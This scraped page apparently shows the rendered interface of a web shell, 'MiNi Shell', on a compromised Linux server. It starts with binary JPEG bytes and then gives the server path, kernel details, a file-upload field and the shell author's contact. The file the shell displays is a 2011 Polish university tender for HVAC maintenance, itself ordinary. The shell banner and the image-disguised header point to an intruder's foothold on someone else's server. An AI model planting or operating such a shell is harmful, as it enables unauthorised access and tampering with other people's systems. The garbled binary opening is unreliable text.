JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110202/16106-N-2011.html

<p class="kh_header"><b>Gdańsk: 1.Przedmiotem zamówienia jest wykonywanie w latach 2011-2014 konserwacji  urządzeń wentylacji i klimatyzacji w budynkach Politechniki Gdańskiej i w Centrum Informatycznym Trójmiejskiej Akademickiej Sieci Komputerowej ( CI TASK ), z siedzibą w Politechnice Gdańskiej</b><br>
<b>Numer ogłoszenia: 16106 - 2011; data zamieszczenia: 02.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska, Dział Eksploatacji , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 347 11 22, faks +48 58 347 12 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Przedmiotem zamówienia jest wykonywanie w latach 2011-2014 konserwacji  urządzeń wentylacji i klimatyzacji w budynkach Politechniki Gdańskiej i w Centrum Informatycznym Trójmiejskiej Akademickiej Sieci Komputerowej ( CI TASK ), z siedzibą w Politechnice Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot  zamówienia  obejmuje:
1.1.Wykonywanie,     raz   na  trzy   miesiące,    następujących    czynności   ( zależnie    od  rodzaju  urządzenia ):
a)sprawdzenie  poprawnej pracy zaworów trójdrogowych przy nagrzewnicach
	i chłodnicach wodnych central wentylacyjnych;
b)sprawdzenie poprawnej pracy zabezpieczeń przeciwzamrożeniowych;
c)sprawdzenie  stanu technicznego i konserwacja pomp obiegowych;
d)sprawdzenie  stanu technicznego i konserwacja silników elektrycznych w   
centralach;
e)sprawdzenie  stopnia zużycia oraz regulacja siły naciągu pasków napędowych wentylatorów i wymienników  obrotowych; wymiana pasków zużytych lub zerwanych  na  nowe;
f)sprawdzenie stanu  technicznego i konserwacja nagrzewnic i chłodnic   
zainstalowanych  w centralach i w kanałach wentylacyjnych;
g)sprawdzenie stanu  technicznego i konserwacja instalacji odprowadzania skroplin
przy centralach wentylacyjnych;
h)sprawdzenie stanu technicznego, konserwacja i ewentualna regulacja   
przepustnic  wielopłaszczyznowych powietrza;
i)sprawdzenie  stanu technicznego  i  konserwacja nawilżaczy powietrza, 
a  w szczególności  sprawdzenie drożności instalacji  odprowadzania kondensatu     
oraz czyszczenie filtrów i cylindrów nawilżacza;
j)sprawdzenie stanu  technicznego i konserwacja jednostek wewnętrznych   
klimatyzatorów, a w szczególności czyszczenie filtrów powietrza i powierzchni   
parowników;
k)sprawdzenie stanu technicznego i konserwacja instalacji odprowadzania skroplin
z jednostek  wewnętrznych i zewnętrznych klimatyzatorów;
l)sprawdzenie stanu technicznego i konserwacja jednostek zewnętrznych  
klimatyzatorów;
m)sprawdzenie stanu technicznego i  konserwacja  agregatów wody lodowej;
n)sprawdzenie stanu technicznego instalacji wody lodowej  wraz z instalacją uzupełniania glikolu;  uzupełnianie ubytków  glikolu;
o)sprawdzenie  stanu  technicznego  i  konserwacja  instalacji  elektrycznej,   
doprowadzonej   do   urządzeń wentylacji  i klimatyzacji;
1.2. Sporządzenie  protokołów  z  przeprowadzonej  konserwacji  (wg p.4 pp. 4.1),  
podpisanych, po dokonaniu odbioru wykonanych prac, przez  osoby     
wykazane  w  Załączniku nr 8 do SIWZ   i    przez wykonawcę.
W  protokole  zostaną  zawarte,  co najmniej,   następujące  dane: 
	-   data  przeprowadzenia  konserwacji; 
	-   skład zespołu  wykonującego konserwację;
	-   nazwa urządzenia i  miejsce zainstalowania 
      -   zakres wykonanych czynności  konserwacyjnych ;
	-   ustalenia  wynikające  z przeprowadzonych  prób  i  oględzin;
	-   ustalenia  dotyczące  dopuszczenia  urządzenia  do  dalszej  eksploatacji;
	-   wnioski  dotyczące koniecznego wykonania dodatkowych  prac  ;


1.3.Wykonanie  w terminie: 3 m-ce od daty podpisania  umowy  i  dalej w    
odstępach 12-to  miesięcznych   następujących  czynności:
a)wymiana filtrów w centralach wentylacyjnych;
b)czyszczenie czerpni powietrza i komory rozprężnej central; 
c)próby  szczelności  instalacji  chłodniczej;
d)badanie  ciągłości  przewodu  ochronnego   i  pomiar  rezystancji  izolacji.
1.4. Sporządzenie  protokołów  z  przeprowadzonych czynności  prób  i pomiarów          
( wg  p.4. pp.4.3a  do 4.3d ) podpisanych,  po dokonaniu odbioru wykonanych prac,  	przez osoby     wykazane w  Załączniku  nr  8  do  SIWZ   i   przez  wykonawcę.     
W  protokole  zostaną  zawarte, co najmniej,   następujące  dane: 
     -    data  przeprowadzenia  czynności, prób  i   pomiarów; 
	-    skład zespołu przeprowadzającego  czynności,  próby  i  pomiary;
	-    zakres  przeprowadzonych  prób  i  pomiarów;
	-    ustalenia  wynikające  z  przeprowadzonych  pomiarów  i  oględzin;
	-    wniosek  dotyczący  dopuszczenia  urządzenia  do  dalszej  eksploatacji;
	-    wnioski  w sprawie konieczności przeprowadzenia niezbędnych prac  i   inwestycji;
1.5. Zapewnienie obecności serwisu podczas imprez ( koncerty, zjazdy, sympozja itp. )odbywających się w budynkach Politechniki Gdańskiej: Auditorium Novum i WETiI B.Czas i miejsce dyżurów oraz liczba osób dyżurujących będzie uzgadniane indywidualnie z organizatorem.
Przybliżona liczba imprez, dla obu budynków:   2  miesięcznie.
Przybliżony czas trwania imprezy:  2 do 4 godz.
Koszty  związane z serwisem podczas imprez należy uwzględnić w cenie oferty.
1.6. Usuwanie awarii urządzeń wentylacji i klimatyzacji, na każde wezwanie uprawnionych przedstawicieli Zamawiającego.  Koszty robocizny związane z tymi działaniami należy uwzględnić  w cenie oferty.  Za części  zamienne,  wykorzystane do usunięcia awarii,  zapłaci  Zamawiający,  zgodnie z warunkami  zawartymi w p. 8.
1.7. Wszystkie  czynności,  związane z  konserwacją  i naprawami, muszą  być  wykonywane zgodnie  z  zaleceniami  producentów  urządzeń. 
2.Koszty materiałów eksploatacyjnych takich jak: filtry do central wentylacyjnych 
( wymienianych raz na 12 miesięcy ), paski napędowe wentylatorów, paski napędowe do wymienników obrotowych wykonawca  zobowiązany jest  uwzględnić w cenie oferty. 
3.Zamawiający dopuszcza częstszą, niż  raz na 12 miesięcy, wymianę filtrów  w  
centralach, za dodatkową zapłatą, na pisemne zlecenie kierownika  obiektu i po  
wcześniejszym  przedstawieniu pisemnej oferty cenowej przez wykonawcę.
4.Koszty drobnych materiałów takich jak: uszczelki drzwi i klap rewizyjnych do central, materiały uszczelniające, drobne elementy  zamocowań,  czynnik do badania szczelności instalacji chłodniczych, czynnik chłodniczy do uzupełniania małych ubytków, smary    oraz  robociznę  potrzebną  do wymiany  części zamiennych  wykonawca  zobowiązany jest  uwzględnić w cenie oferty.
5.Zakup,  przez  wykonawcę,  wszelkich części zamiennych oraz  czynnika chłodniczego, niezbędnych  do wykonania napraw, szczególnie ich cena, powinien zostać  wcześniej  uzgodniony,   pisemnie,   z  kierownikiem  danego  obiektu.
6.Wykonawca  zobowiązuje  się  do  przestrzegania  przepisów  BHP  podczas  wykonywania prac  konserwacyjnych  i  serwisowych.
7.Dla  sprawnej  realizacji  Zamówienia Wykonawca poda  numery telefonów do  kontaktów  telefonicznych oraz  adres  poczty  email  i  nr  faksu.
8.Wymaga  się,  aby  czas reakcji na wezwanie, do usunięcia awarii, rozumiany jako czas od telefonicznego powiadomienia o awarii urządzenia  do momentu  przybycia  odpowiedniego serwisanta i podjęcia przez  niego  czynności w kierunku jej usunięcia, był nie dłuższy niż  120 minut.
Czas usunięcia awarii nie powinien trwać dłużej niż 48 godz. od momentu przybycia serwisu, a jeżeli naprawa wymaga zakupu części zamiennych, trudno osiągalnych, czas ten nie powinien przekroczyć 2 tygodni.
W  przypadku  nie  usunięcia  awarii  w  terminie   2 tygodni,  zamawiający
ma prawo wyznaczyć, inną firmę, a kosztami, robocizny, usunięcia  awarii  obciążyć  wykonawcę.
9.Zamawiający wymaga udzielenia  gwarancji na wymienione elementy, zgodnie z gwarancją producenta oraz 3 miesięcznej na całość przedmiotu zamówienia po zakończeniu umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 50.72.10.00-5, 50.73.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium wynosi 12.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do prowadzenia działalności w zakresie niniejszego zamówienia nie jest wymagane posiadanie specjalnych uprawnień.
Zamawiający uzna powyższy warunek za spełniony na podstawie złożonego oświadczenia - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony,  jeżeli  wykonawca wykaże, że zrealizował w  okresie ostatnich  trzech lat, przed upływem terminu składania ofert,
a  jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie,  co najmniej trzy usługi odpowiadające przedmiotowi zamówienia ( konserwacja urządzeń klimatyzacji i wentylacji w obiektach o dużej kubaturze,  jak szkoły, biurowce, hotele itp.), o wartości, każdej, nie mniejszej niż 30.000,00 zł brutto. Zamawiający sprawdzi spełnienie tego warunku  na podstawie  załącznika  nr  7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony,  jeżeli  wykonawca  wykaże,  że     
              dysponuje: 
-co najmniej 4 osobami, z których każda  posiada  kwalifikacje  i  uprawnienia,  wydane  przez SEP: grupa G 1,  do  wykonania  prac  na  stanowisku  eksploatacji  i konserwacji  sieci, urządzeń  i  instalacji   elektrycznych  o  napięciu  do 1 kV  oraz grupa G2, eksploatacja i konserwacja urządzeń chłodniczych o mocy do 50 kW. Ponadto osoby te powinny posiadać aktualne badania lekarski dopuszczające  do pracy  na  wysokości.
-co  najmniej  jedną  osobą,  wyznaczoną  na   kierownika  grupy, z uprawnieniami  G1  i   G2,  na stanowisko dozoru.
Zamawiający  sprawdzi  spełnienie  tego  warunku  na  podstawie  załącznika  nr  6 do  SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna  powyższy warunek za spełniony na podstawie złożonego oświadczenia -załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów do oddania Wykonawcy, do dyspozycji, niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (opcjonalnie)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 Zamawiający przewiduje możliwość dokonania zmiany umowy :
a.w przypadku zmiany nazwy i innych danych identyfikacyjnych strony;
b.zmian  terminu wykonania usługi z przyczyn  takich jak działanie siły wyższej;
c.w przypadku zmiany obowiązujących stawek podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska, Dział Eksploatacji, pawilon przy ulicy Siedlickiej, pokój 6, ul. Narutowicza 11/12, 80-233, Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2011 godzina 09:00, miejsce: Politechnika Gdańska, Dział Eksploatacji, pawilon przy ulicy Siedlickiej, pokój 6, ul. Narutowicza 11/12, 80-233, Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com